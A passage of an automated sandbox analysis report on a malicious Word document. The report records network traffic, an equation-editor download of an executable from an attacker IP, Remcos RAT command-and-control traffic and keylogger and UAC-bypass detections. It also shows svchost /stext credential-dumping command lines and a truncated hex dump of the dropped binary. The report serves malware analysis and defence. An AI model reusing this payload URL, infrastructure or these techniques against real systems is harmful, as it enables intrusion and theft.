Oct 13, 2024 07:29:06.206649065 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.215040922 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.234813929 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.234863043 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.234894991 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.234925985 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.234957933 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.234988928 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.235022068 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.235025883 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.235025883 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.235025883 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.242361069 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.288862944 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289138079 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289170027 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289207935 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289238930 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289271116 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289323092 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289336920 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.289336920 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.289355993 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289403915 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289405107 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.289436102 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289467096 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.289469957 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289501905 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289522886 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.289546967 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289577961 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289608955 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289635897 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289666891 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289697886 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.289794922 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.289794922 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.289982080 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290013075 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290045023 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290076017 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290107012 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290138960 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290169954 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290185928 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.290185928 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.290199995 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290231943 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290252924 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.290262938 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290296078 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290316105 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.290329933 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290610075 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290642023 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.290663958 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.290674925 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.291512966 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.489866972 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.532288074 CEST	80	49163	178.237.33.50	192.168.2.22
Oct 13, 2024 07:29:06.533313036 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:29:11.655620098 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:11.661087990 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.661287069 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:11.661355972 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.661536932 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:11.666421890 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.666723013 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.666752100 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.666779041 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.666898012 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:11.666898012 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:11.666898012 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:11.672100067 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.672128916 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.672154903 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.672180891 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.672207117 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.672269106 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:11.672343969 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.672370911 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.672564983 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.677448034 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.677479982 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.677505970 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.832681894 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:11.833292007 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:11.860285044 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:11.865653992 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:24.680226088 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:24.683178902 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:24.688360929 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:54.716444016 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:54.718440056 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:54.723504066 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:30:15.608874083 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:30:15.910064936 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:30:16.518477917 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:30:17.719727039 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:30:20.116787910 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:30:24.771716118 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:30:24.773520947 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:30:24.779484034 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:30:24.919296026 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:30:34.520803928 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:30:54.810606003 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:30:54.814784050 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:30:54.819622040 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:31:24.852102995 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:31:24.854351997 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:31:24.859421968 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:31:54.898212910 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:31:54.903187037 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:31:54.908210039 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:32:24.944644928 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:32:24.946333885 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:32:24.951370001 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:32:54.976489067 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:32:55.186403990 CEST	49162	2404	192.168.2.22	107.173.4.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 07:29:04.873740911 CEST	54562	53	192.168.2.22	8.8.8.8
Oct 13, 2024 07:29:04.882900000 CEST	53	54562	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2024 07:29:04.873740911 CEST	192.168.2.22	8.8.8.8	0xb807	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 13, 2024 07:29:04.882900000 CEST	8.8.8.8	192.168.2.22	0xb807	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

104.168.7.25

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	104.168.7.25	80	3384	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 07:28:58.679474115 CEST	316	OUT	GET /350/taskhostw.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 104.168.7.25 Connection: Keep-Alive
Oct 13, 2024 07:28:59.167737007 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 05:28:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sat, 12 Oct 2024 07:42:35 GMT ETag: "13b200-62442bf48212e" Accept-Ranges: bytes Content-Length: 1290752 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/lnk Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 92 92 52 12 fc c1 52 12 fc c1 52 12 fc c1 14 43 1d c1 50 12 fc c1 cc b2 3b c1 53 12 fc c1 5f 40 23 c1 61 12 fc c1 5f 40 1c c1 e3 12 fc c1 5f 40 1d c1 67 12 fc c1 5b 6a 7f c1 5b 12 fc c1 5b 6a 6f c1 77 12 fc c1 52 12 fd c1 72 10 fc c1 e7 8c 16 c1 02 12 fc c1 e7 8c 23 c1 53 12 fc c1 5f 40 27 c1 53 12 fc c1 52 12 6b c1 53 12 fc c1 e7 8c 22 c1 53 12 fc c1 52 69 63 68 52 12 fc c1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 63 28 0a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 d0 0a 00 00 00 00 00 4a 7f 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sRRRCP;S_@#a_@_@g[j[[jowRr#S_@'SRkS"SRichRPELc(g"J@ N@@@L\|p<(0q+pH@.text. `.rdata@@.datatR@.rsrc<(p*@@.reloc0qr@@B
Oct 13, 2024 07:28:59.167910099 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: DAL7hCY:hCY9hCYhC~Y_,hCmYhC\YQchCJYSLQ@SL
Oct 13, 2024 07:28:59.167929888 CEST	448	IN	Data Raw: 4b 14 8d 43 10 89 4d 08 89 45 0c 8b 38 0f b6 84 13 10 08 00 00 8b 09 89 4d e8 83 f8 10 0f 8f 74 a4 03 00 0f 84 4d a4 03 00 83 e8 08 74 5c 48 48 0f 84 06 a4 03 00 48 48 0f 84 b7 a3 03 00 48 48 0f 84 4c a3 03 00 8b 7d f8 ff 45 f4 8b 45 0c 8b 4d 08 Data Ascii: KCME8MtMt\HHHHHHL}EEMUEM;S\|[EMpWVE_^[]}}tWVE8t!EM9t9}ujWPVEUeSVW}3CEW](HulX
Oct 13, 2024 07:28:59.168544054 CEST	1236	IN	Data Raw: 4d f8 83 f9 ff 74 0c ff 75 fc 57 e8 7a fd ff ff 8b 4d f8 8b 45 0c 83 38 ff 74 05 8b 08 89 4d f8 8b 40 04 83 f8 ff 74 1e 89 45 fc ff 75 f0 6a 00 50 51 57 e8 95 fc ff ff 8b 45 f4 8b 55 0c 8b 4d 08 e9 23 ff ff ff 8b 45 fc eb e0 80 f9 18 75 ee 8b 0a Data Ascii: MtuWzME8tM@tEujPQWEUM#EuMUuWLXLqPjujuH]UuWLMPPjjjuH]UQSVuWL!uWLVE*MIb
Oct 13, 2024 07:28:59.168561935 CEST	1236	IN	Data Raw: 0f b7 c3 50 56 e8 97 fd ff ff e9 04 ff ff ff 49 74 0d 49 49 0f 85 e2 fe ff ff e9 83 9f 03 00 51 51 56 e8 e1 ae 08 00 e9 e7 fe ff ff 6a 02 e9 7e fe ff ff 6a 01 e9 77 fe ff ff 51 e9 63 a0 03 00 6a 01 e9 2b a0 03 00 55 8b ec 56 57 8b 7d 08 8b b7 c8 Data Ascii: PVItIIQQVj~jwQcj+UVW}Mt<ESt;u>^;u>V!EYt[jj7XH_^]uMt9t6UM$uE(@S]#
Oct 13, 2024 07:28:59.169558048 CEST	1236	IN	Data Raw: 45 e0 66 89 87 8a 00 00 00 eb ae 55 8b ec a1 b4 57 4c 00 8b 4d 18 83 f8 01 0f 85 f1 9d 03 00 8b 45 08 83 f8 ff 74 03 89 41 58 8b 45 0c 83 f8 ff 74 03 89 41 5c 8b 45 10 85 c0 7e 03 89 41 60 8b 45 14 85 c0 7e 03 89 41 64 5d c2 14 00 55 8b ec 51 a1 Data Ascii: EfUWLMEtAXEtA\E~A`E~Ad]UQXLVuWj8W4XLjZU;$XL0F;GVW~d~h~D
Oct 13, 2024 07:28:59.169578075 CEST	1236	IN	Data Raw: 00 00 3b be 84 00 00 00 75 3f 83 ff 03 7c 16 8b 46 74 8d 0c b8 8b 01 83 38 00 75 09 4f 83 e9 04 83 ff 03 7d f0 89 be 84 00 00 00 eb 1c ff 4e 78 8b 4e 78 8b 46 74 ff 34 88 e8 cc ea 01 00 8b 46 74 59 8b 4e 78 83 24 88 00 83 7e 78 03 76 0f 8b 4e 78 Data Ascii: ;u?\|Ft8uO}NxNxFt4FtYNx$~xvNxFtD8t_^]jUQ(XLVW90XLun=4XLhY"E}P XL54XLF54XL$XL0XL9MIO_^
Oct 13, 2024 07:28:59.170545101 CEST	1236	IN	Data Raw: fa 48 00 ff 75 1c ff 15 20 f7 48 00 89 07 85 c0 0f 84 e1 98 03 00 56 6a eb 50 ff 15 10 f5 48 00 8b 45 24 89 47 08 8b 45 0c 89 47 3c 8b 45 20 89 47 40 8d 45 e8 50 ff 37 ff 15 34 f6 48 00 8b 45 f0 2b 45 e8 89 47 44 8b 45 f4 2b 45 ec 6a 00 6a 11 89 Data Ascii: Hu HVjPHE$GEG<E G@EP74HE+EGDE+EjjGHHPj07HjWWL\=WLuhV@j(jjHWLWLWLj5XLG_^[] 3"'MPMRU}WWL
Oct 13, 2024 07:28:59.170563936 CEST	1236	IN	Data Raw: 00 8b 4d 28 88 96 90 00 00 00 88 8e 91 00 00 00 a1 1c 58 4c 00 a3 48 58 4c 00 89 3d 44 58 4c 00 f6 c1 01 0f 84 d6 9f 03 00 f6 c1 04 0f 84 24 a0 03 00 83 7d d8 00 75 09 6a 00 56 53 e8 28 ef ff ff 80 bb 98 01 00 00 00 0f 85 f1 a0 03 00 83 7b 50 ff Data Ascii: M(XLHXL=DXL$}ujVS({Pu1{Tu6>tWj6HM,dk_^[]4EtsPWYsTWWe*CHCfCCCCCCNCCCCCCCC-CICjCC
Oct 13, 2024 07:28:59.171502113 CEST	1236	IN	Data Raw: 03 0f 84 d3 9d 03 00 48 48 0f 84 b1 9d 03 00 83 66 70 00 8d 4e 54 c7 46 7c 01 00 00 00 e8 24 27 00 00 8d 4e 24 e8 1c 27 00 00 8d 4e 14 e8 14 27 00 00 56 e8 56 dc 01 00 59 5f 8b c6 5e c2 04 00 51 e8 d9 47 00 00 83 66 78 00 eb 9b 8b 4e 70 85 c9 74 Data Ascii: HHfpNTF\|$'N$'N'VVY_^QGfxNptQZSV3WN~^^^.DN$&DNT^4^8^<^@^D~H~L^PD^d^h^p^xF\|fffff_
Oct 13, 2024 07:28:59.174245119 CEST	1236	IN	Data Raw: 6e 22 00 00 56 b9 d0 52 4c 00 e8 a6 49 00 00 8d 45 a4 50 8d 4d d0 e8 dd 5b 00 00 68 70 fa 48 00 8d 4d e0 e8 27 47 00 00 33 f6 8d 45 d0 56 6a 01 50 8d 45 e0 50 e8 f4 4d 00 00 8d 4d e0 e8 30 22 00 00 68 60 fa 48 00 8d 4d e0 c7 45 f0 00 01 00 00 89 Data Ascii: n"VRLIEPM[hpHM'G3EVjPEPMM0"h`HMEuEFVVEPEPMME!MauMH?EPMW}WhDHYYwWhHYY~WhHYYWhHYYu;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49163	178.237.33.50	80	3592	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 07:29:04.906090975 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Oct 13, 2024 07:29:05.537712097 CEST	1170	IN	HTTP/1.1 200 OK date: Sun, 13 Oct 2024 05:29:05 GMT server: Apache content-length: 962 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

Target ID:	0
Start time:	01:28:55
Start date:	13/10/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fef0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	01:28:55
Start date:	13/10/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:29:00
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\taskhostw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\taskhostw.exe"
Imagebase:	0xcf0000
File size:	1'290'752 bytes
MD5 hash:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:29:01
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\taskhostw.exe"
Imagebase:	0x1390000
File size:	1'290'752 bytes
MD5 hash:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:29:02
Start date:	13/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\taskhostw.exe"
Imagebase:	0xf80000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	01:29:05
Start date:	13/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx"
Imagebase:	0xf80000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:29:05
Start date:	13/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ckvxrh"
Imagebase:	0xf80000
File size:	20'992 bytes
